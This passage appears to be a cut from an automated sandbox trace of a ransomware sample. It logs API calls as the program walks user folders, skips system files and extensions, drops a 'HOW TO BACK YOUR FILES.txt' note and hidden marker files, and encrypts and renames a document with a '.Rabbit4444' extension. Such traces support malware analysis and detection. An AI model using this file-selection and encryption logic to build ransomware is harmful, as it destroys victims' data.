cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0053.119] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.119] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0053.119] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3325b84, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x3325b84, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x3325b84, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0053.119] lstrcmpiW (lpString1="1033", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.119] lstrcmpiW (lpString1="1033", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.119] lstrcmpiW (lpString1="1033", lpString2="Rabbit4444.exe") returned -1 [0053.119] lstrcmpiW (lpString1="1033", lpString2=".") returned 1 [0053.119] lstrcmpiW (lpString1="1033", lpString2="..") returned 1 [0053.119] lstrcmpiW (lpString1="1033", lpString2="windows") returned -1 [0053.119] lstrcmpiW (lpString1="1033", lpString2="bootmgr") returned -1 [0053.119] lstrcmpiW (lpString1="1033", lpString2="pagefile.sys") returned -1 [0053.119] lstrcmpiW (lpString1="1033", lpString2="boot") returned -1 [0053.119] lstrcmpiW (lpString1="1033", lpString2="ids.txt") returned -1 [0053.119] lstrcmpiW (lpString1="1033", lpString2="NTUSER.DAT") returned -1 [0053.119] lstrcpyW (in: lpString1=0x130ebbe, lpString2="1033" | out: lpString1="1033") returned="1033" [0053.119] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6388 [0053.119] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x90) returned 0x11ee90 [0053.119] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6390 | out: ListHead=0xf68b0, ListEntry=0xf6390) returned 0xf6370 [0053.119] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3325b84, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x3325b84, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x3325b84, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 0 [0053.119] FindClose (in: hFindFile=0x1028d0 | out: hFindFile=0x1028d0) returned 1 [0053.119] lstrcpyW (in: lpString1=0x130ebbe, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0053.120] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\document building blocks\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0053.121] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0053.121] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0053.122] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.122] CloseHandle (hObject=0x278) returned 1 [0053.122] CloseHandle (hObject=0x27c) returned 1 [0053.122] GetCurrentThreadId () returned 0xd98 [0053.122] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6390 [0053.122] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033" [0053.122] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11ee90 | out: hHeap=0xe0000) returned 1 [0053.122] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6388 | out: hHeap=0xe0000) returned 1 [0053.122] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033" [0053.122] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\" [0053.122] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\.BFC0E91B00AE8A0620D3" [0053.122] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\document building blocks\\1033\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0053.123] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0053.125] FlushFileBuffers (hFile=0x27c) returned 1 [0053.126] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0053.126] CloseHandle (hObject=0x27c) returned 1 [0053.127] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033") returned 71 [0053.127] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0053.127] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3325b84, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x3325b84, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0xe8fba773, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102950 [0053.127] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.127] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.127] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0053.127] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0053.127] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3325b84, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x3325b84, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0xe8fba773, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.127] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.127] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.127] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0053.127] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0053.127] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0053.127] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8fba773, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8fba773, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8fe09b0, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0053.127] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.127] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0053.127] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3325b84, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x3325b84, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x3325b84, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="16", cAlternateFileName="")) returned 1 [0053.127] lstrcmpiW (lpString1="16", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.127] lstrcmpiW (lpString1="16", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.128] lstrcmpiW (lpString1="16", lpString2="Rabbit4444.exe") returned -1 [0053.128] lstrcmpiW (lpString1="16", lpString2=".") returned 1 [0053.128] lstrcmpiW (lpString1="16", lpString2="..") returned 1 [0053.128] lstrcmpiW (lpString1="16", lpString2="windows") returned -1 [0053.128] lstrcmpiW (lpString1="16", lpString2="bootmgr") returned -1 [0053.128] lstrcmpiW (lpString1="16", lpString2="pagefile.sys") returned -1 [0053.128] lstrcmpiW (lpString1="16", lpString2="boot") returned -1 [0053.128] lstrcmpiW (lpString1="16", lpString2="ids.txt") returned -1 [0053.128] lstrcmpiW (lpString1="16", lpString2="NTUSER.DAT") returned -1 [0053.128] lstrcpyW (in: lpString1=0x130ebc8, lpString2="16" | out: lpString1="16") returned="16" [0053.128] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6388 [0053.128] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x96) returned 0x1132d8 [0053.128] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6390 | out: ListHead=0xf68b0, ListEntry=0xf6390) returned 0xf6370 [0053.128] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3325b84, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x3325b84, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x3325b84, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="16", cAlternateFileName="")) returned 0 [0053.128] FindClose (in: hFindFile=0x102950 | out: hFindFile=0x102950) returned 1 [0053.128] lstrcpyW (in: lpString1=0x130ebc8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0053.128] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\document building blocks\\1033\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0053.129] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0053.129] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0053.129] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.129] CloseHandle (hObject=0x278) returned 1 [0053.129] CloseHandle (hObject=0x27c) returned 1 [0053.129] GetCurrentThreadId () returned 0xd98 [0053.129] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6390 [0053.129] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16" [0053.129] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1132d8 | out: hHeap=0xe0000) returned 1 [0053.129] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6388 | out: hHeap=0xe0000) returned 1 [0053.130] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16" [0053.130] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\" [0053.130] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\.BFC0E91B00AE8A0620D3" [0053.130] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\document building blocks\\1033\\16\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0053.133] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0053.136] FlushFileBuffers (hFile=0x27c) returned 1 [0053.137] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0053.137] CloseHandle (hObject=0x27c) returned 1 [0053.137] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16") returned 74 [0053.137] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0053.137] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3325b84, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x334bde3, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0xe8fe09b0, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102950 [0053.138] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.138] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.138] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0053.138] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0053.138] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3325b84, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x334bde3, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0xe8fe09b0, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.138] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.138] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.138] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0053.138] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0053.138] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0053.138] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8fe09b0, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8fe09b0, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8fe09b0, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0053.138] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.138] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0053.138] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x334bde3, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x334bde3, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x584285c, ftLastWriteTime.dwHighDateTime=0x1d32745, nFileSizeHigh=0x0, nFileSizeLow=0x388cc7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Built-In Building Blocks.dotx", cAlternateFileName="BUILT-~1.DOT")) returned 1 [0053.138] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.138] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.138] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="Rabbit4444.exe") returned -1 [0053.138] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2=".") returned 1 [0053.138] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="..") returned 1 [0053.138] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="windows") returned -1 [0053.138] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="bootmgr") returned 1 [0053.138] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="pagefile.sys") returned -1 [0053.138] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="boot") returned 1 [0053.138] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="ids.txt") returned -1 [0053.138] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="NTUSER.DAT") returned -1 [0053.138] lstrcpyW (in: lpString1=0x130ebce, lpString2="Built-In Building Blocks.dotx" | out: lpString1="Built-In Building Blocks.dotx") returned="Built-In Building Blocks.dotx" [0053.138] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx", dwFileAttributes=0x0) returned 1 [0053.139] lstrlenW (lpString="Built-In Building Blocks.dotx") returned 29 [0053.139] lstrlenW (lpString="Rabbit4444") returned 10 [0053.139] lstrcmpiW (lpString1="locks.dotx", lpString2="Rabbit4444") returned -1 [0053.139] lstrlenW (lpString=".dll") returned 4 [0053.139] lstrcmpiW (lpString1="dotx", lpString2=".dll") returned 1 [0053.139] lstrlenW (lpString=".lnk") returned 4 [0053.139] lstrcmpiW (lpString1="dotx", lpString2=".lnk") returned 1 [0053.139] lstrlenW (lpString=".ini") returned 4 [0053.139] lstrcmpiW (lpString1="dotx", lpString2=".ini") returned 1 [0053.139] lstrlenW (lpString=".sys") returned 4 [0053.139] lstrcmpiW (lpString1="dotx", lpString2=".sys") returned 1 [0053.139] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\document building blocks\\1033\\16\\built-in building blocks.dotx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0053.139] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0053.139] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14444983942) returned 1 [0053.139] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=3706055) returned 1 [0053.139] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0053.139] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0053.139] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x388fd0, lpName=0x0) returned 0x298 [0053.141] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x200000, dwNumberOfBytesToMap=0x188fd0) returned 0x2c20000 [0053.179] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x200000) returned 0x2db0000 [0053.216] UnmapViewOfFile (lpBaseAddress=0x2db0000) returned 1 [0053.237] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0053.237] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0053.237] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0053.237] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0053.237] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0053.238] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0053.238] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0053.238] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0053.238] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14454842329) returned 1 [0053.238] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0053.238] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0053.238] UnmapViewOfFile (lpBaseAddress=0x2c20000) returned 1 [0053.252] CloseHandle (hObject=0x298) returned 1 [0053.252] CloseHandle (hObject=0x278) returned 1 [0053.252] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx.Rabbit4444") returned 115 [0053.252] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\document building blocks\\1033\\16\\built-in building blocks.dotx"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\document building blocks\\1033\\16\\built-in building blocks.dotx.rabbit4444"), dwFlags=0x1) returned 1 [0053.253] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x334bde3, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x334bde3, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x584285c, ftLastWriteTime.dwHighDateTime=0x1d32745, nFileSizeHigh=0x0, nFileSizeLow=0x388cc7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Built-In Building Blocks.dotx", cAlternateFileName="BUILT-~1.DOT")) returned 0 [0053.253] FindClose (in: hFindFile=0x102950 | out: hFindFile=0x102950) returned 1 [0053.253] lstrcpyW (in: lpString1=0x130ebce, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0053.253] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\document building blocks\\1033\\16\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0053.316] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, 